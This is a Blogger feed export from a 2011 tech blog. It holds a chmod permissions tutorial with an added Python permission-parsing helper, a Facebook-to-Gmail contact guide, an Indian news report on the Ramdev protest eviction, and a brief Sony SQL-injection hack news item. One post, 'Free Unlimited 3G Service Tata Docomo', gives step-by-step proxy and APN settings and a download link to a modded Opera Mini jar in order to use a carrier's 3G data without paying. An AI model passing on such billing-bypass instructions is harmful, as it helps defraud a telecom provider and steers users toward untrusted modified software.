&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=ltcPBedriwE:EkH9CnugwVg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=ltcPBedriwE:EkH9CnugwVg:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=ltcPBedriwE:EkH9CnugwVg:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=ltcPBedriwE:EkH9CnugwVg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=ltcPBedriwE:EkH9CnugwVg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/92657359500582765/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/08/basic-linux-commands.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/92657359500582765?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/92657359500582765?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/08/basic-linux-commands.html" title="Basic Linux Commands" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C0cMR38yfSp7ImA9WhdQEUg.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-4202751458246019551</id><published>2011-08-12T17:41:00.000+05:30</published><updated>2011-08-12T17:41:26.195+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-12T17:41:26.195+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Ubuntu" /><title>File Permissions on Linux</title><content type="html">First of all, let's figure out what the command "chmod" does.&lt;br /&gt;
&lt;br /&gt;
chmod - The chmod command allows you to alter access rights to files and directories. All files and directories have security permissions that grant access to the user, particular groups, or all other users. To view your files' settings, at the shell prompt type: ls -alt&lt;br /&gt;
You should see some files with the following in front of them (an example follows):&lt;br /&gt;
total 4&lt;br /&gt;
drwxrwsr-x 7 file1 file1 1024 Apr 6 14:30 .&lt;br /&gt;
drwxr-s--x 22 file2 file2 1024 Mar 30 18:20 ..&lt;br /&gt;
d-wx-wx-wx 3 file3 file3 1024 Apr 6 14:30 content&lt;br /&gt;
drwxr-xr-x 2 file4 file4 1024 Mar 25 20:43 files&lt;br /&gt;
&lt;br /&gt;
What do the letters in front of the files/directories mean?&lt;br /&gt;
r indicates that it is readable (someone can view the file’s contents)&lt;br /&gt;
w indicates that it is writable (someone can edit the file’s contents)&lt;br /&gt;
x indicates that it is executable (someone can run the file, if executable)&lt;br /&gt;
- indicates that no permission to manipulate has been assigned.&lt;br /&gt;
&lt;br /&gt;
When listing your files, the first character lets you know whether you’re looking at a file or a directory. It’s not part of the security settings. The next three characters indicate your access restrictions. The next three indicate your group's permissions, and finally other users' permissions.&lt;br /&gt;
&lt;br /&gt;
Use chmod followed by the permission you are changing. In very simple form this would be:&lt;br /&gt;
chmod 755 filename&lt;br /&gt;
The example above will grant you full rights, group rights to execute and read, and all others access to execute the file.&lt;br /&gt;
# 	Permission&lt;br /&gt;
7 	full&lt;br /&gt;
6 	read and write&lt;br /&gt;
5 	read and execute&lt;br /&gt;
4 	read only&lt;br /&gt;
3 	write and execute&lt;br /&gt;
2 	write only&lt;br /&gt;
1 	execute only&lt;br /&gt;
0 	none&lt;br /&gt;
&lt;br /&gt;
Still confused? Use the table above to define the settings for the three  "users." In the command, the first number refers to your permissions,  the second refers to group, and the third refers to general users.&lt;br /&gt;
&lt;br /&gt;
Typing the command: chmod 751 filename&lt;br /&gt;
&lt;br /&gt;
gives you full access, the group read and execute, and all others execute only permission.&lt;br /&gt;
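&lt;br /&gt;
To check the digit table against real listings, the Python code below converts in both directions: octal digits to rwx letters, and an ls-style string back to octal. It is an added example, not part of the original article, and it goes beyond the table by also decoding the s and t letters (setuid, setgid, sticky) that appear in listings such as drwxrwsr-x above and by noting world-writable entries. The function names are assumptions; the listing is the one shown earlier in the article.&lt;br /&gt;

```python
FILE_TYPES = {"-": "file", "d": "directory", "l": "symlink"}
# Per class (owner, group, other): letter that replaces x when the special
# bit is set, the value of that bit in the leading octal digit, and its name.
SPECIAL = (("s", 4, "setuid"), ("s", 2, "setgid"), ("t", 1, "sticky"))


def symbolic(octal):
    """'751' -> 'rwxr-x--x' using the digit table (4=read, 2=write, 1=execute)."""
    out = ""
    for ch in octal[-3:]:
        d = int(ch, 8)
        out += ("r" if d // 4 else "-")
        out += ("w" if d // 2 % 2 else "-")
        out += ("x" if d % 2 else "-")
    return out


def parse_mode(text):
    """'drwxrwsr-x' -> {'type': 'directory', 'octal': '2775', 'notes': ['setgid']}."""
    if len(text) != 10:
        raise ValueError("expected 10 characters, e.g. drwxr-xr-x")
    digits, special, notes = [], 0, []
    for slot, (letter, bit, name) in enumerate(SPECIAL):
        r, w, x = text[1 + 3 * slot:4 + 3 * slot]
        if r not in "r-" or w not in "w-" or x not in "x-" + letter + letter.upper():
            raise ValueError("bad permission triplet %r" % (r + w + x))
        if x.lower() == letter:
            # Lower case: special bit and execute. Upper case: special bit only.
            special += bit
            notes.append(name)
        digits.append(4 * (r == "r") + 2 * (w == "w") + (x in ("x", letter)))
    if text[8] == "w":  # write permission for all other users
        if text[0] == "d" and "sticky" not in notes:
            notes.append("world-writable directory without sticky bit")
        else:
            notes.append("world-writable")
    return {
        "type": FILE_TYPES.get(text[0], "other"),
        "octal": "%d%d%d%d" % (special, digits[0], digits[1], digits[2]),
        "notes": notes,
    }


# The listing from the article, used as sample input.
PAGE_LISTING = """
total 4
drwxrwsr-x 7 file1 file1 1024 Apr 6 14:30 .
drwxr-s--x 22 file2 file2 1024 Mar 30 18:20 ..
d-wx-wx-wx 3 file3 file3 1024 Apr 6 14:30 content
drwxr-xr-x 2 file4 file4 1024 Mar 25 20:43 files
"""


def audit(listing):
    """Return (name, octal mode, notes) for every entry line of an ls -l listing."""
    rows = []
    for line in listing.strip().splitlines():
        fields = line.split()
        if len(fields) != 9:  # skips the "total 4" header
            continue
        info = parse_mode(fields[0])
        rows.append((fields[-1], info["octal"], info["notes"]))
    return rows


if __name__ == "__main__":
    print("chmod 755 gives", symbolic("755"))
    print("chmod 751 gives", symbolic("751"))
    for name, octal, notes in audit(PAGE_LISTING):
        print("%-8s %s %s" % (name, octal, ", ".join(notes) or "-"))
```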
&lt;br /&gt;
I hope this article helps anyone having trouble with file permissions on linux. Don't forget to rate and comment. Thanks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-4202751458246019551?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=OL7Au8xD4gg:eULhrJDLcsk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=OL7Au8xD4gg:eULhrJDLcsk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=OL7Au8xD4gg:eULhrJDLcsk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=OL7Au8xD4gg:eULhrJDLcsk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=OL7Au8xD4gg:eULhrJDLcsk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/4202751458246019551/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/08/file-permissions-on-linux.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/4202751458246019551?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/4202751458246019551?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/08/file-permissions-on-linux.html" title="File Permissions on Linux" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;A04FQX05eSp7ImA9WhZUFU4.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-1717500368593364224</id><published>2011-06-08T19:01:00.000+05:30</published><updated>2011-06-08T19:01:50.321+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-08T19:01:50.321+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><title>Synchronise Facebook contacts Gmail</title><content type="html">&lt;div class="" style="clear: both; text-align: center;"&gt;The way of synchronising or merging your facebook contacts into Gmail or any other application consists of 3 steps:&lt;br /&gt;
&lt;br /&gt;
1. Yahoo fetching contacts from Facebook profile.&lt;br /&gt;
&lt;br /&gt;
2. Exporting contacts from yahoo to the required format file.&lt;br /&gt;
&lt;br /&gt;
3. Importing your contacts from the file.&lt;br /&gt;
&lt;br /&gt;
Follow the images :&lt;br /&gt;
&lt;br /&gt;
Find this on the screen.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="182" src="http://2.bp.blogspot.com/-WSjYE4-xuyw/Te93_zcuKCI/AAAAAAAAAF8/Un3Ywm1SI0I/s320/Selection_005.png" width="320" /&gt;&lt;br /&gt;
&lt;br /&gt;
Click on Facebook in the menu.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/-9WO32xaqSBc/Te93_VjPXWI/AAAAAAAAAF4/Gn0pAQIYiTQ/s1600/Selection_006.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="183" src="http://3.bp.blogspot.com/-9WO32xaqSBc/Te93_VjPXWI/AAAAAAAAAF4/Gn0pAQIYiTQ/s320/Selection_006.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&amp;nbsp;Allow your action.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="216" src="http://1.bp.blogspot.com/-Wh8TNVyMM-E/Te94B7v7GLI/AAAAAAAAAGI/33qyGsj0poo/s320/Selection_007.png" width="320" /&gt;&lt;br /&gt;
&lt;br /&gt;
Let it process.&lt;br /&gt;
&lt;br /&gt;
&lt;img border="0" height="148" src="http://4.bp.blogspot.com/-Dapf74rD3-U/Te94BYQj19I/AAAAAAAAAGE/V1fi82o7Mw0/s320/Selection_008.png" width="320" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Finally you get this.&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-hWfmqqU4Op4/Te94Ajp8kEI/AAAAAAAAAGA/GZ9n_-fsKBI/s1600/Selection_009.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;img border="0" height="181" src="http://2.bp.blogspot.com/-hWfmqqU4Op4/Te94Ajp8kEI/AAAAAAAAAGA/GZ9n_-fsKBI/s320/Selection_009.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Contacts copied !!&lt;br /&gt;
&lt;br /&gt;
Now go to:&lt;br /&gt;
&lt;br /&gt;
Tools --&amp;gt; Export&lt;br /&gt;
&lt;br /&gt;
Save the file and update your facebook contacts wherever you want.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-1717500368593364224?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=9NKTHrM14lA:5F4P7uDj3K4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=9NKTHrM14lA:5F4P7uDj3K4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=9NKTHrM14lA:5F4P7uDj3K4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=9NKTHrM14lA:5F4P7uDj3K4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=9NKTHrM14lA:5F4P7uDj3K4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/1717500368593364224/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/synchronise-facebook-contacts-gmail.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1717500368593364224?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1717500368593364224?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/synchronise-facebook-contacts-gmail.html" title="Synchronise Facebook contacts Gmail" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-WSjYE4-xuyw/Te93_zcuKCI/AAAAAAAAAF8/Un3Ywm1SI0I/s72-c/Selection_005.png" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEcDR3k4cCp7ImA9WhZUFU4.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-1706417184248343131</id><published>2011-06-08T17:52:00.001+05:30</published><updated>2011-06-08T17:57:56.738+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-08T17:57:56.738+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Internet" /><title>Free Unlimited 3G Service Tata Docomo</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="http://1.bp.blogspot.com/-MAednlVaVwk/Te9qtdRJ0yI/AAAAAAAAAF0/VJOU21m6mv8/s1600/Tata-Docomo-Awards-3G-Network-Contract-to-Huawei.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-MAednlVaVwk/Te9qtdRJ0yI/AAAAAAAAAF0/VJOU21m6mv8/s320/Tata-Docomo-Awards-3G-Network-Contract-to-Huawei.jpg" width="309" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;Tata Docomo SIM Card with a balance of more than Rs. 1&lt;/li&gt;
&lt;li&gt;3G enabled cellphone&lt;/li&gt;
&lt;/ol&gt;&lt;h3&gt;Steps&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;Create New Access Point Using Below Configuration and restart your cellphone.&lt;br /&gt;
&lt;blockquote&gt;&lt;ul&gt;&lt;li&gt;Name : Tata Docomo or any&lt;/li&gt;
&lt;li&gt;Access Point ( APN ) – tata.docomo.dive.in&lt;/li&gt;
&lt;li&gt;Homepage : www.google.com or any&lt;/li&gt;
&lt;li&gt;Proxy : 202.87.41.147&lt;/li&gt;
&lt;li&gt;Proxy Port : 8080&lt;/li&gt;
&lt;li&gt;Username : leave blank&lt;/li&gt;
&lt;li&gt;Password : leave blank&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;&lt;/li&gt;
&lt;li&gt;Download &lt;a href="http://www.easy-share.com/1915941325/OperaMini4.2HandlerMod.jar" target="_blank" title="Opera Mini Handler Browser"&gt;&lt;i&gt;Operamini 4.2 Handler Browser&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open your Opera mini handler and do the following changes in the Settings:&lt;br /&gt;
&lt;blockquote&gt;&lt;ul&gt;&lt;li&gt;Set &lt;i&gt;Divein Settings&lt;/i&gt; as Default Settings For Opera Mini&lt;/li&gt;
&lt;li&gt;Set &lt;i&gt;http&lt;/i&gt; in Custom Field in your Opera Mini handler&lt;/li&gt;
&lt;li&gt;Set Socket Server to &lt;i&gt;http://203.115.112.5.server4.operamini.com&lt;/i&gt; OR &lt;i&gt;http://10.124.72.171.server4.operamini.com&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;&lt;/li&gt;
&lt;li&gt;Done!! Now use your free unlimited 3G service. Enjoy!!&lt;br /&gt;
&lt;br /&gt;
Source:Hungry-Hackers&lt;/li&gt;
&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-1706417184248343131?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/1706417184248343131/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/free-unlimited-3g-service-tata-docomo.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1706417184248343131?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/1706417184248343131?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/free-unlimited-3g-service-tata-docomo.html" title="Free Unlimited 3G Service Tata Docomo" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-MAednlVaVwk/Te9qtdRJ0yI/AAAAAAAAAF0/VJOU21m6mv8/s72-c/Tata-Docomo-Awards-3G-Network-Contract-to-Huawei.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C0IBQX0zcCp7ImA9WhZUEkk.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-700831261146420821</id><published>2011-06-05T08:09:00.000+05:30</published><updated>2011-06-05T08:09:10.388+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-05T08:09:10.388+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Indian Government" /><category scheme="http://www.blogger.com/atom/ns#" term="Latest News" /><title>Midnight swoop by police ends Ramdev camp</title><content type="html">&lt;div class="separator" style="clear: both; text-align: 
center;"&gt;&lt;a href="http://4.bp.blogspot.com/-EioQIdD1yj8/TersFNVl--I/AAAAAAAAAFw/miobclq3QLw/s1600/Ramdev1_20110605.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://4.bp.blogspot.com/-EioQIdD1yj8/TersFNVl--I/AAAAAAAAAFw/miobclq3QLw/s320/Ramdev1_20110605.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Delhi Police cancelled permission for the  yoga camp at Ramlila Grounds and ordered Baba Ramdev to stay out of  Delhi's limits late on Saturday night. Ramdev was removed from the  Ramlila Grounds and was escorted to Delhi border by Delhi Police. Police  stormed the yoga guru's fast venue and removed him from the spot.  Ramdev is now under police detention and there is an externment order  against him. However, sources have told CNN-IBN that he has still not  been taken out of New Delhi. &lt;br /&gt;
&lt;br /&gt;
The permission for yoga camp was cancelled and section 144 was  imposed at the Ramlila Grounds as protestors were thrown out. Police  fired tear gas shells to disperse Baba's followers which included women  and children. More than 30 people were injured in the police action.  Towards dawn all the protestors had been removed and the pandal was  dismantled. &lt;br /&gt;
Baba's PRO spoke to CNN-IBN right after the yoga guru was taken  away by police. He said, "This is unfair. We request the Chief Justice  of India to take note of this and pass an order on the Delhi police and  government of India. Thousands have been injured." &lt;br /&gt;
The first signs of the crackdown came shortly after 1 am, with a  heavy contingent of Delhi Police landing up at the Ramlila Grounds and  surrounding the protest site sensing trouble. The crowds resisted and  began forming rings around the stage in their bid to prevent any  forcible eviction leading to scuffles. &lt;br /&gt;
By 1.30 am a shaken Baba Ramdev appeared on the stage, took over the public address system and began addressing the gathering. Taking turns to exhort the crowd to stay peaceful and also protesting what he called an unfair action, he even appealed to the people of Delhi to march towards Ramlila Grounds. &lt;br /&gt;
The police continued to close in towards the stage in their bid  to remove Baba Ramdev from the crowd of supporters who were surrounding  him. &lt;br /&gt;
The ring of supporters around Baba Ramdev on the stage and thousands of others milling around the stage meant the police would find it tough to evict him without resistance. After a brief scuffle and some stone pelting, the police used teargas shells to scatter the crowd - to create an opening to ensure the yoga guru was whisked away without the crowd being able to intervene. &lt;br /&gt;
Just as the police were about to evict Baba Ramdev, a minor fire  broke out on the stage even as crowds milled around. Luckily the flames  were put out in time before any serious damage could occur. &lt;br /&gt;
By 2.30 am the stage had been cleared up. A posse of policemen  led by the Deputy Commissioner of Central District had taken Baba Ramdev  away from the stage along with his close associates. Hundreds of  policemen fanned around the venue using the opportunity to clear away  most of those milling around the area near the stage. The bustling  Ramlila Ground had been cleared of the crowds within two hours of the  police first arriving at the spot. &lt;br /&gt;
The post-midnight swoop by the police - the scuffles and the  tough action meant several participants of the protest fast sustained  injuries. In fact while Ramdev's supporters claimed hundreds had been  injured, official figures put the number of injured at 30. &lt;br /&gt;
At 5 am, police forcibly removed the remaining protestors.  Several women followers were seen being forcibly taken away by women  police constables. Apart from evicting followers, police also made sure  most of the pandals were removed. The police also made sure protestors  didn't use the machinery available to stir another round of agitation. &lt;br /&gt;
Within just half an hour - by 5.30 am - the entire venue looked  almost deserted, barring a few protestors who were being whisked away by  police and of course security personnel. One could see personal  belongings strewn all over the place and most of the tents were removed. &lt;br /&gt;
Almost 3000 policemen were deployed in and around Ramlila  Grounds. The Rapid Action Force of CRPF were also called in to the  Central District. Police said that the purpose of setting up the yoga  shivir at Ramlila Maidan was to carry out yoga activities not for any  agitation. &lt;br /&gt;
Ramdev made it clear after a flip-flop on Saturday evening that  he won't end his hunger strike until he gets a written agreement from  the government on recovering black money. &lt;br /&gt;
He got the letter from the government late on Saturday night, but did not end his agitation.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-700831261146420821?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/700831261146420821/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/midnight-swoop-by-police-ends-ramdev.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/700831261146420821?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/700831261146420821?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/06/midnight-swoop-by-police-ends-ramdev.html" title="Midnight swoop by police ends Ramdev camp" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-EioQIdD1yj8/TersFNVl--I/AAAAAAAAAFw/miobclq3QLw/s72-c/Ramdev1_20110605.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CEUFQn07cSp7ImA9WhZUEUs.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-5875617132888720180</id><published>2011-06-04T10:02:00.001+05:30</published><updated>2011-06-04T10:06:53.309+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-04T10:06:53.309+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacker's News" /><title>Sony Hacked for 12th time !!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="http://1.bp.blogspot.com/-tp5OhqWtOTo/Tel9bPuo2zI/AAAAAAAACIY/uCrmHrA-N_Y/s1600/sony-hacked-again+%25281%2529.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="116" src="http://1.bp.blogspot.com/-tp5OhqWtOTo/Tel9bPuo2zI/AAAAAAAACIY/uCrmHrA-N_Y/s320/sony-hacked-again+%25281%2529.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Okay! Idahc, the Lebanese hacker, is back to hit Sony. This time he claims to have hacked the database of the Application Store at Sony Europe&amp;nbsp;&lt;b&gt;http://apps.pro.sony.eu/&lt;/b&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: medium;"&gt;A new day, a new surprise for Sony! Yesterday, Sony Pictures was hacked and its &lt;a href="http://www.thehackernews.com/2011/06/sony-pictures-hacked-and-database.html"&gt;&lt;span class="Apple-style-span" style="color: #274e13;"&gt;database leaked by LulzSec&lt;/span&gt;&lt;/a&gt;. Last time,&amp;nbsp;Sony Ericsson got hacked by Idahc, the Lebanese hacker;&amp;nbsp;&lt;a href="http://www.thehackernews.com/2011/05/sony-erricson-got-hacked-by-idahca.html"&gt;&lt;span class="Apple-style-span" style="color: #274e13;"&gt;read here&lt;/span&gt;&lt;/a&gt;.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: medium;"&gt;The attack is the same, using SQL injection. Here is the proof:&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Vo0n5nJM6SM/Tel-epzaIOI/AAAAAAAACIc/Gm6KuwdpvB0/s1600/Untitled.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="151" src="http://3.bp.blogspot.com/-Vo0n5nJM6SM/Tel-epzaIOI/AAAAAAAACIc/Gm6KuwdpvB0/s320/Untitled.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
